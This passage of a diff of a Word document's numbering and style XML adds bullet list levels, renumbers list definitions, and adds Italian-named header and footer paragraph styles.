+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="561B161F"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="9A64578A"/>
@@ -3294,7 +4821,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5ECB57B5"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E3DAB198"/>
@@ -3380,7 +4907,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6267650E"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="1486BBBA"/>
@@ -3529,7 +5056,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="686A7968"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="AF642DA8"/>
@@ -3678,7 +5205,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="695E02A4"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="1B76F0F0"/>
@@ -3827,7 +5354,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6CDF7FB3"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7084172C"/>
@@ -3976,7 +5503,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6CEC6A36"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="2C88B578"/>
@@ -4065,7 +5592,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7168611A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E1808E96"/>
@@ -4178,7 +5705,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="76AF5C5E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="3FAAE8C2"/>
@@ -4267,7 +5794,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="772F064C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="B224C640"/>
@@ -4382,10 +5909,10 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="405763203">
-    <w:abstractNumId w:val="5"/>
+    <w:abstractNumId w:val="7"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="62338613">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="15"/>
   </w:num>
   <w:num w:numId="3" w16cid:durableId="993728766">
     <w:abstractNumId w:val="3"/>
@@ -4411,55 +5938,64 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="5" w16cid:durableId="340402470">
+    <w:abstractNumId w:val="12"/>
+  </w:num>
+  <w:num w:numId="6" w16cid:durableId="840893291">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="7" w16cid:durableId="1137642995">
     <w:abstractNumId w:val="10"/>
   </w:num>
-  <w:num w:numId="6" w16cid:durableId="840893291">
-    <w:abstractNumId w:val="4"/>
-  </w:num>
-  <w:num w:numId="7" w16cid:durableId="1137642995">
-    <w:abstractNumId w:val="8"/>
-  </w:num>
   <w:num w:numId="8" w16cid:durableId="1901280077">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="14"/>
   </w:num>
   <w:num w:numId="9" w16cid:durableId="1505129166">
-    <w:abstractNumId w:val="9"/>
+    <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="10" w16cid:durableId="1966766617">
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="11" w16cid:durableId="1079909917">
-    <w:abstractNumId w:val="13"/>
+    <w:abstractNumId w:val="16"/>
   </w:num>
   <w:num w:numId="12" w16cid:durableId="1981299414">
-    <w:abstractNumId w:val="15"/>
+    <w:abstractNumId w:val="18"/>
   </w:num>
   <w:num w:numId="13" w16cid:durableId="1699313517">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="17"/>
   </w:num>
   <w:num w:numId="14" w16cid:durableId="998113943">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="19"/>
   </w:num>
   <w:num w:numId="15" w16cid:durableId="2034728165">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="16" w16cid:durableId="1215310160">
-    <w:abstractNumId w:val="6"/>
+    <w:abstractNumId w:val="8"/>
   </w:num>
   <w:num w:numId="17" w16cid:durableId="480774904">
-    <w:abstractNumId w:val="18"/>
+    <w:abstractNumId w:val="21"/>
   </w:num>
   <w:num w:numId="18" w16cid:durableId="1595555786">
-    <w:abstractNumId w:val="19"/>
+    <w:abstractNumId w:val="22"/>
   </w:num>
   <w:num w:numId="19" w16cid:durableId="1238134191">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="20"/>
   </w:num>
   <w:num w:numId="20" w16cid:durableId="1038969861">
-    <w:abstractNumId w:val="7"/>
+    <w:abstractNumId w:val="9"/>
   </w:num>
   <w:num w:numId="21" w16cid:durableId="1410880810">
-    <w:abstractNumId w:val="20"/>
+    <w:abstractNumId w:val="23"/>
+  </w:num>
+  <w:num w:numId="22" w16cid:durableId="2060012936">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="23" w16cid:durableId="305207671">
+    <w:abstractNumId w:val="13"/>
+  </w:num>
+  <w:num w:numId="24" w16cid:durableId="1386561492">
+    <w:abstractNumId w:val="6"/>
   </w:num>
 </w:numbering>
 </file>
@@ -5067,7 +6603,6 @@
   <w:style w:type="character" w:default="1" w:styleId="Carpredefinitoparagrafo">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="Tabellanormale">
@@ -5460,6 +6995,50 @@
       </w:tblBorders>
     </w:tblPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="Intestazione">
+    <w:name w:val="header"/>
+    <w:basedOn w:val="Normale"/>
+    <w:link w:val="IntestazioneCarattere"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00DE028B"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4819"/>
+        <w:tab w:val="right" w:pos="9638"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="IntestazioneCarattere">
+    <w:name w:val="Intestazione Carattere"/>
+    <w:basedOn w:val="Carpredefinitoparagrafo"/>
+    <w:link w:val="Intestazione"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="00DE028B"/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Pidipagina">
+    <w:name w:val="footer"/>
+    <w:basedOn w:val="Normale"/>
+    <w:link w:val="PidipaginaCarattere"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00DE028B"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4819"/>
+        <w:tab w:val="right" w:pos="9638"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="PidipaginaCarattere">
+    <w:name w:val="Piè di pagina Carattere"/>
+    <w:basedOn w:val="Carpredefinitoparagrafo"/>
+    <w:link w:val="Pidipagina"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="00DE028B"/>
+  </w:style>
 </w:styles>
 </file>
 

</xml_diff>